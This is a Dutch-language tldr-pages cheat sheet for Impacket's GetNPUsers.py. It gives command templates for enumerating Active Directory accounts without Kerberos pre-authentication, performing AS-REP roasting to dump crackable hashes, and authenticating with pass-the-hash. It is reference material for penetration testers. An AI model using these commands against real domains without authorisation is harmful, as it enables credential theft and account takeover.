mirror of
https://github.com/tldr-pages/tldr.git
synced 2025-04-29 23:24:55 +02:00
25 lines
1.2 KiB
Markdown
25 lines
1.2 KiB
Markdown
# GetNPUsers.py
|
|
|
|
> Ga over alle Active Directory accounts met Kerberos pre-authentication uitgeschakeld, die vatbaar kunnen zijn voor AS-REP roasing aanvallen.
|
|
> Onderdeel van de Impacket suite.
|
|
> Meer informatie: <https://github.com/fortra/impacket>.
|
|
|
|
- Ga over alle gebruikers met Kerberos pre-authentication uitgeschakeld (standaard anonieme enumeration):
|
|
|
|
`GetNPUsers.py {{domein}}/ -usersfile {{pad/naar/gebruikerslijst}} -dc-ip {{domain_controller_ip}}`
|
|
|
|
- Voer AS-REP roasting uit en dump kraakbare hashes voor offline kraking:
|
|
|
|
`GetNPUsers.py {{domein}}/ -usersfile {{pad/naar/gebruikerslijst}} -dc-ip {{domain_controller_ip}} -request`
|
|
|
|
- Authenticeer met valide credentials (als anonieme binding is uitgeschakeld):
|
|
|
|
`GetNPUsers.py {{domein}}/{{username}}:{{password}} -usersfile {{pad/naar/gebruikerslijst}} -dc-ip {{domain_controller_ip}}`
|
|
|
|
- Gebruik pass-the-hash authenticatie in plaats van een wachtwoord:
|
|
|
|
`GetNPUsers.py {{domein}}/{{username}} -hashes {{LM_Hash}}:{{NT_Hash}} -usersfile {{pad/naar/gebruikerslijst}} -dc-ip {{domain_controller_ip}}`
|
|
|
|
- Sla de output op in een bestand:
|
|
|
|
`GetNPUsers.py {{domein}}/ -usersfile {{pad/naar/gebruikerslijst}} -dc-ip {{domain_controller_ip}} -request > {{pad/naar/output.txt}}`
|